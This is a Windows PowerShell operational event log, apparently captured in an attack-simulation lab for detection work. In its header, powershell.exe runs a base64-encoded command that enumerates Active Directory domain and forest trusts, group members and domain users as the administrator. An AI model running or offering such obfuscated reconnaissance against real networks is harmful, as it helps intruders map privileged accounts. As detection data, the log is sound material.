        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -E ZwBlAHQALQBuAGUAdABkAG8AbQBhAGkAbgB0AHIAdQBzAHQAOwAgAGcAZQB0AC0AbgBlAHQAZgBvAHIAZQBzAHQAdAByAHUAcwB0ADsAIABnAGUAdAAtAGEAZABkAG8AbQBhAGkAbgA7ACAAZwBlAHQALQBhAGQAZwByAG8AdQBwAG0AZQBtAGIAZQByADsAIABnAGUAdAAtAGQAbwBtAGEAaQBuAHUAcwBlAHIA
        Engine Version = 5.1.14393.4402
        Runspace ID = eb15df6a-cb8f-414d-b537-2b34749ddbd2
        Pipeline ID = 1
        Command Name = Get-ADGroupMember
        Command Type = Cmdlet
        Script Name = 
        Command Path = 
        Sequence Number = 17
        User = ATTACKRANGE\administrator
        Connected User = 
        Shell ID = Microsoft.PowerShell


User Data:
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480318
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a4ee5a7-ece1-4f0c-86e6-e22a1bdda822
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480317
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0b5231a3-1db5-43d2-9eb0-401665885c39
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480316
Keywords=None
Message=Completed invocation of ScriptBlock ID: eda41651-1787-4040-9bcf-8a7b86e8123f
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480315
Keywords=None
Message=Started invocation of ScriptBlock ID: eda41651-1787-4040-9bcf-8a7b86e8123f
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480314
Keywords=None
Message=Started invocation of ScriptBlock ID: 0b5231a3-1db5-43d2-9eb0-401665885c39
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480313
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: 0b5231a3-1db5-43d2-9eb0-401665885c39
Path:
06/15/2021 07:49:18 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480312
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a4ee5a7-ece1-4f0c-86e6-e22a1bdda822
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361